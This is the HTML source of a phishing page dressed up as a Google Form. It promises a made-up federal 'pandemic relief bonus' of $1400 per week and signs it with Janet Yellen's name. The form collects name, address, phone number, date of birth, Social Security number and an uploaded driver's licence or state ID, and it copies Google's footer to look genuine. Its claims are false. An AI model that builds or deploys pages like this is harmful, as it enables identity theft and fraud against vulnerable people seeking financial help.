<html>
	<head>
		<title></title>
		<style>
            body{background: #F6E8E8;
            }
			div.all{font-family: Arial,sans-serif;
            font-size: 15px;
            margin: 0px 370px 0px 370px;
            width: fit-content;
            padding-bottom: 10px;
			}
            div.all>div{box-shadow: 0px 0px 1px black;
            }
            div.all .heading{font-size: 32px;
            line-height: 40px;
            font-family: "century gothic";
            letter-spacing: -1px;
            margin-top: 1px;
            }
            img{width: 633px;
            }
            div.one p{line-height: 20px;
            font-size: 14.5px;
            }
			div.one{border-radius: 10px; 
			background: white;
			width: 595.7px;
			min-width: 20px;
			padding: 18px;
			}
            div.two{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            } 
            div.two input{border-width: 0px;
            outline: 0px solid white;
            border-bottom: 1px solid rgb(214,205,205);
            width: 300px;
            }
            input[placeholder="Your answer"]{font-size: 16px
            }
            div.three{background: white;
            border-radius: 10px;
            width: 600px;
            height: 140px;
            padding: 15px;
            }
            div.three input[type=radio]{width: 19px;
            height: 19px;
            }
            div.four{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            }
            div.four input{border-width: 0px;
            outline: 0px solid white;
            border-bottom: 1px solid rgb(214,205,205);
            width: 124px;
            padding-bottom: 5px;
            }
            div.five{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            } 
            div.five input{border-width: 0px;
            outline: 0px solid white;
            border-bottom: 1px solid rgb(214,205,205);
            width: 300px;
            }
            div.six{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            } 
            div.six input{border-width: 0px;
            outline: 0px solid white;
            border-bottom: 1px solid rgb(214,205,205);
            width: 300px;
            }  
            div.seven{background: white;
            border-radius: 10px;
            width: 600px;
            height: 290px;
            padding: 15px;
            }
            div.seven input[type=radio]{width: 19px;
            height: 19px;
            }
            div.seven>input{ border: 2px solid black;
            }
            div.sev{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            }
            div.eight{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            }
            div.eight input[type=radio]{width: 19px;
            height: 19px;
            }
            div.nine{background: white;
            border-radius: 10px;
            width: 600px;
            height: 120px;
            padding: 15px;
            }
            div.nine input[type=checkbox]{width: 19px;
            height: 19px;
            }
            button.to{background: #AA2A28;
            padding: 10px 30px 10px 30px;
            color: white;
            border-radius: 5px;
            border: 0px solid #F6E8E8;
            }
            button.do{font-size: 14px;
            background: #F6E8E8;
            color: #AA2A28;
            border: 0px solid #F6E8E8;
            margin-left: 540px;
            margin-top: -50px;
            width: 90px;
            padding: 10px;
            border-radius: 5px;
            }
            button.do:hover{font-size: 14px;
            background: #EEE4E9;
            color: #AA2A28;
            border: 0px solid #F6E8E8;
            margin-left: 540px;
            width: 90px;
            padding: 10px;
            border-radius: 5px;
            }
            p.ten{color: #93745a;
            font-size: 13px;
            margin-top: -10px;
            }
            p.eleven{font-size: 12px;
            color: #93745a;
            text-align: center;
            }
            p.eleven a{color: #93745a;
            }
            p.twelve{font-size: 22px;
            color: #cbb9ab;
            text-align: center;
            }
            p.twelve span{color: #b6afaf;
            }
		</style>
	</head>
	<body>
		<div class="all">
			<img src="IMAGE/New Picture.png"/><br/><br/>
			<div class="one">
				<p class="heading">GOVERNMENT PANDEMIC EXTRA<br/>STIMULUS BONUS</p>
				<p>GOVERNMENT PANDEMIC EXTRA STIMULUS BONUS</p>
				<p>This is an opputunity for you to be among the people who will benefit from pandemic relief bonus set up by the federal government, if you're 
				been affected one way or the other with the outbreak of corona which has more effect on our economy and citizen source of livelihood, 
				this is a scheme set up by FG to ease and help you each citizen with a sum of $1400 every weeks as pandemic relief bonus.
				You don't have to leave the comfort of your house or visit any of branch cause of the COVID19 outbreak recently, so you 
				can get to apply online and be part of the citizen who will benefit from the "COVID PANDEMIC RELIEF EXTRA BONUS" You've 
				tried to get government rent or housing assitance</p>
				<p>You either:</p>
				<p>Expect to earn no more than $99,000 in 2020/2021 ($198,000 if you're couple filling joint)</p>
				<p>Didn't have to report any income to the internal Revenue Service in 2019</p>
				<p>You can't pay your full rent due to significantly reduced income ir huge medical bills</p>
				<p>You're paying as much towards your rent as you can</p>
				<p>If evicted you'd become homeless or have to move in with other people in close quarters</p>
				<p>You understand that at the end of the ban, the landlord can evict you if you don't pay all rent owned.</p><br/>
				<p>Regards<br/>Janet Yellen</p>
				<p>Kindly fill the following information to file your claim.</p>
				<hr/>
				<p>The name and photo associated with your Google Account will be recorded when you upload files and submit this form. 
				Your email address is not part if your response</p>
			</div><br/>
			<div class="two">
				<p>Full Name*</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="two">
				<p>Home Address*</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="two">
				<p>City*</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="two">
				<p>Region*</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="two">
				<p>Postal/Zip Code*Your answer*</p><br/>
				<form>
					<input type="number" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="two">
				<p>Phone number</p><br/>
				<form>
					<input type="number" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="three">
				<p>Gender</p><br/>
				<form>
					<input type="radio"  name="2" required /><label>Male</label><br/><br/>
					<input type="radio" name="2" required /><label>Female</label><br/><br/>
				</form>
			</div><br/>
			<div class="four">
				<p>Date of Birth</p><br/>
				<form>
					<input type="date" placeholder="Date" required />
				</form>
			</div><br/>
			<div class="five">
				<p>Social Security Number</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="six">
				<p>Education Level</p><br/>
				<form>
					<input type="text" placeholder="Your answer" required />
				</form>
			</div><br/>
			<div class="seven">
				<p>Employment<p>
				<form>
					<input type="radio" name="3" required /><label>Part Time</label><br/><br/>
					<input type="radio" name="3" required /><label>Full Time</label><br/><br/>
					<input type="radio" name="3" required /><label>Self Employed</label><br/><br/>
					<input type="radio" name="3" required /><label>Unemployed</label><br/><br/>
					<input type="radio" name="3" required /><label>Student</label><br/><br/>
					<input type="radio" name="3" required /><label>Retired</label><br/><br/>
				</form>
			</div><br/>
			<div class="sev">
				<p>State ID or Driver's License</p>
				<input type="file" required />
			</div><br/>
			<div class="eight">
				<p>Have you Received Any COVID19 Relief Bonus</p>
				<form>
					<input type="radio" name="4" required /><label>Yes</label><br/><br/>
					<input type="radio" name="4" required /><label>No</label>
				</form>
			</div><br/>
			<div class="nine">
				<p>I CERTIFIED THAT I SHALL BE PROSECUTED IF ANY OF THE INFO I 
					SUBMITTED IS FALSE OR STOLEN*</p>
				<form>
					<input type="checkbox" required /><label>I accept Terms and conditions.</label><br/>
				</form>
			</div><br/>
			<form>
				<button class="to">Submit</button>
			</form>
			<form>
				<button class="do">clear form</button>
			</form>
			<p class="ten">Never submit passwords through Google</p>
			<p class="eleven">This content is neither created nor endorsed by Google. <a href="#">Report Abuse</a> - <a href="#">Terms of service</a> - <a href="#">Privacy policy</a></p>
			<p class="twelve"><span>Google</span> Forms</p>
		</div>
	</body>
</html>